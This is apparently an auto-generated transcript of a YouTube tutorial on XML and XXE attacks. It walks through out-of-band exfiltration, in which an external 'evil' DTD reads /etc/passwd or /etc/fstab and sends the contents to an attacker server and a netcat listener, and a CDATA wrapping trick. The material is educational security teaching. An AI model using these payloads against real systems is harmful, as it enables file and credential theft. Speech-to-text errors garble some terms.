xml just works xml has great ide usability xml has comments xml supports any formatting xml is just great or is it before we jump straight into the video I'd like to introduce you guys to my buddy John Hammond who's gonna be joining me in today's episode take it away hey how's it going everybody my name is John Hammond and I have a small YouTube channel that takes a look at capture the flag challenges and cybersecurity concepts just like this one I want to give a special thank you to pone function for letting me co-host here and I'm really looking forward to this let's start with XML XML stands for extensible markup language similar to HTML but the main difference is that hTML is about the data representation however XML is more about the data transportation and sometimes storage XML is human readable and it's used in a ton of places like api's UI layouts and styles and Android applications configuration files RSS feeds and a lot more let's look at a quick example of an XML document to understand the structure of it the first line specifies the xml metadata in this case the version which will be used by the XML parser at the time of processing and this is optional for some parsers here the person tag is the root element of a document and every well-formed XML document has to have one and only one root element inside the root element we have two more nested tags name and age with some values there's some syntactic rules for a valid XML document and here are some of them tag names are case sensitive this means the opening and closing tag names have to be exactly the same certain characters like quotes ampersands and angle brackets are not allowed inside of an XML document directly because the parser would have a hard time understanding if the input was part of a value or just a tag the workaround for this is something called entities entities are simple storage units think of them like as variables for XML you can assign a value to it and use it multiple times in different parts of the XML document these entities are defined in a separate part of the XML document called the document type definition or simply DTD let's take a look at a simple example to see how and entities work as you can see we've just modified our previous example an entity is created inside a doctype which basically tells the XML parser that this is a document type definition inside which we've defined a storage unit or simply an entity and we've named it as name instead of writing John and directly as the value of a tag we've used an entity and referred to it down in the name tag this saves a ton of time when it comes to the use of the same values in multiple places inside the XML document there are three types of entities there are general parameter and predefined entities the example that you saw just now is the case of general entities where we just have some value that's being referenced somewhere else parameter entities are somewhat special these are only allowed inside a DTD and they are more flexible for example creating an entity whose value is another entity this feature is really useful when it comes to exploiting xx YZ or XML external entities lastly we have predefined entities which are just a set of predefined values of some special characters like quotes and ampersands which might break the XML document for example when you try to use a less than symbol in your document as a value the XML parser would error out why because like I had mentioned earlier special characters like angle brackets and quotes can break the XML document so in order to get around this problem we have predefined entities so instead of using a less than symbol directly you can use this ampersand number sign x3c which is basically the hex representation of the symbols ASCII value now that we know a bit about XML it's time for us to jump into some security parts of it let's start with entities just as we saw earlier entities are just like variables which can store values and then can be used later on but XML is much more than just storing some values in an entity and using them there are a lot more features offered by XML standards and external entities is one of them entities can not only store the value that you specify but they can also pull values from a local file or even fetch the remote data over the network and store them as entities for later use and as you can see this opens up a wide range of attack surface now let's take a look at how external entities work in this example we have an entity called subscribe and it's being used down in the pown tag you might have noticed that the syntax for the entity definition is a bit different than what we saw earlier there's a new keyword called system and what's that well system is a keyword used in an entity to let the XML parser know that the entity is a type external simply telling the XML parser to fetch the external resource and store it inside the entity another thing to keep in mind is that if the external resource was anything remotely close to the XML syntax like a tag then the XML parser will throw an error letting you know that the XML parsing failed we'll get back to this in the later part of the video but for now I just remembered that this is an expected behavior now coming back to the example the last part you need to know is that the value of this entity is not secret dot txt well in fact that's just the name of the file you would like to read from the actual value is going to be calculated at the time of parsing the file name doesn't have to be like this XML accepts any valid URI which includes File HTTP and other protocols and now if we parse the XML file in an XML parser boom you see the contents of the file secret text let's try this with its entry password we modify the value in the XML to the file that we want to read and boom we see the contents of a setter password and there you go we have the ability to read local files and this attack is called XML external entities or simply xxe and reading local files is just the beginning instead of a file name we can also provide a URL like this and the XML parser would happily fetch the resource for you there are different types of x-axis mainly in-band error based and out-of-band the previous example was pretty much about in bad x-axis where the XML will be parsed and the output will be shown directly on to the screen the error based is somewhat like a blind xxe where you don't get to see a lot of information except a bunch of errors lastly we have the O OB or out-of-band x-axis these are truly blind which means the XML will be parsed and you don't get to see any of the output and you would have to do some sort of an out of bound request to exfiltrate the data let's look at a simple out-of-band xxe scenario we have this web application which parses your XML input and says nothing about it in the response meaning that this is just a blind xxe so to test for blind x-axis we can simply make a request to our web server using external entities instead of the file path let's try that if we use the same XML code from the earlier example and modify the file path to an external URL in our case it's just going to be attacker comm and if we send it over we get the request logged in our server nice this confirms that the server is properly parsing our XML and trying to fetch an external entity this is cool we can make requests as the server this is also known as service our request forgery or SS RF in short but can we do more than just making random requests well we do know that we can read local files from the server and display it but can we accelerate the same file contents in a blind xxe attack yes we can but before jumping into the attack let's talk about about DT DS because they play an important role in the xxe attacks we've seen DT DS before they look something like this they are defined inside a doctype you might have noticed that the DTD isn't directly a part of data they are defined above the root element in an XML document this might be a hint to another feature of T TV that is DT DS can be loaded externally just like entities you can also specify a URI then at the time of processing the parser will fetch the external DTD and parse its contents this allows you to have an organized XML document by separating the definition from the data this feature is very useful not just for developers but for attackers as well if you can load an external DTD then you can unlock another feature of xml that is you can use parameter entities within the markup declaration itself let's look at a simple example to understand the whole mess a bit more consider this example we have an internal DTD or document type definition and we have defined a special type of entity called parameter entity this lets us do some crazy things like defining one entity inside another the parameter entities are only allowed to be referenced inside a DTD below the definition we have our main markup that is pone tag and we've referenced a general entity inside of it now let's trace how the XML parsing works on a high level when the XML parser sees this code it first looks at the version based on the wagon it starts processing the markup the next thing that it does is it looks for a DTD or document type definition that we've defined inside the same XML document this is also called inline DTD then it looks at the percent symbol and it would try to parse it as the parameter entity now it assigns the markup of the general entity as the value to this parameter entity in the next line we're trying to reference the above parameter entity that we just created so that the parser will replace the value of that entity at that position at the end of the definition after parsing it it might look something like this as you can see it's very straightforward at this point now we can access the value of the general entity by referencing it inside the pawn tag so now that we know we can use the parameter entity directly inside the DTD let's try to construct a blind xxe payload consider this as our payload let's quickly run through the XML parsing ignoring the stuff that we already know firstly the parser will read the contents of the ANSI password and story in passwd entity this is a parameter entity and not a general one because we want it to be used inside the DTD in the next line you can see that there is a general entity as the value of the parameter entity called wrapper now when the replacement happens the entire markup might look something like this as you can see this is a general entity and when you try to reference it it will make a request to an external resource and the contents of the file will go along with it as a part of the URL boom we can steal the contents of the file in a blind xxe right let's try that and nope it didn't work why because according to XML specification in an internal d/dt subset parameter entity references must not occur within the mark-up declarations this means that you cannot reference a parameter entity within the markup declaration but you can reference it in the same level as the markup definition well that's kind of confusing to be honest so this video is still running it's not yet over so that means there is a bypass for this right yes there is it's through external DT DS whatever I just explained to you doesn't work within an internal DTD but the specification also states that this constraint doesn't apply to external DT DS so that means we do have a bypass all we have to do is an external DTD instead of an internal one now let's try to include a simple DTD file into our XML as you can see there are no entities defined within the doctype itself but we're trying to include an external DTD which has all the entities we need inside of it so now when you try to include it from an external resource it works exactly like we saw earlier but it also allows you to use parameter entities more flexibly let me explain consider this payload we have an XML file with an external dtt attached to it and we're referencing a general entity send but where is this send entity well the send entity is inside the evil DTD file let's see the contents of it so that we can understand everything more as you can see we're doing the same stuff after reading the passwd file then we can create another parameter entity which is called wrapper and have the general entity send as its value then when the wrapper is referenced down below it replaces the contents of the passwd file in here as a part of the URL and make it as a general entity so now in our main XML file we include the DTD and this is pretty much replaced with what we just calculated and now we do know where the send entity came from it's right here and when you try to reference it it will make a request to fetch the external entity but it doesn't get anything back and we don't really care if it gets a valid response or not because we have successfully exfiltrated the passwd file now let's try this I have the server which hosts the DTD file and I'll also have the netcat listening on port 1 3 3 7 and it's waiting to receive the contents of the passwd file now when I send the xxe payload to the server boom I get the contents of the passwd file sweet alright now that we know how to exfiltrate the password file let's try the same with other file like it said ref stat maybe it's just a file which contains the necessary information to automate the process of mounting partitions let's give this a shot mmm it didn't work what happened as you saw we didn't change anything except the file name it worked with its entry password but not etc fstab let's check out the contents of EPs tab it seems fine or is it as you can see there are a bunch of comments some of which look like XML tags so the parser will try and parse the contents but as you know they're just comments and not well-formed XML syntax so this breaks the parser and it errors out so how do you exfiltrate such breaking data the answer is C data see data stands for character data and it's a special syntax which can handle these breaking artifacts whatever is in between the opening and closing C data tag will not be parsed as markup by the XML parser awesome it's exactly what we wanted the syntax for the C data looks like this and it begins and ends with this syntax for our xxe attack can we do something like this the idea here is that start will be will be replaced by this and end will be replaced by that so in the end looks something like this but this doesn't work because it's a violation of the specification value of the general entity has to be well-formed which means you cannot have an open C data tag like that once you open it you have to close it within the same entity but we're trying to split them into multiple ones so this doesn't work for us so the solution to this problem is to use parameter entities and external DT DS the XML looks very similar to the one we saw earlier but there are minor differences in the DTD we are reading at said refs tab and we're also defining two parameter entities which are basically the starting and ending points of the C data tag in the end we create a wrapper which has a general entity with all the three values as one in the end everything looks something like this and now we can exfiltrate the data but if this is a block Dec sexy you have to include another DTD and then send the data over just like pone showed you earlier XML is not just used in api's but they're also used in a ton of other places like SVG's PDFs office documents and others if you want to listen to an awesome story on blind out-of-band xxe via PDF file uploads check out Stokes video in this video we've just explored how we could read files off of the server but you can do a lot more than that with x-axis you can also do dos attacks which I'm not a fan of but still you can eat a lot of computational resources on the server and it's worth taking a look at it you can also perform service or request forgery attacks via x-axis and fulcrum on half the box is a great example for this if you want to know more about this check out hips axe walkthrough video on it and in some cases it's possible to gain remote code execution as well additionally check out the wax of nicolas and i'm not going to try to pronounce his last name because it's it's hard to be honest and also I'd like to thank John for joining me in this episode check out his channel as well I'll leave the links to everything in the video description I'd like to say one last thing XML parsers are weird each parser behave differently even though there's a good specification for it honestly I don't understand them so XML is old XML is complex XML is not great and xxe is just the beginning [Music] [Music]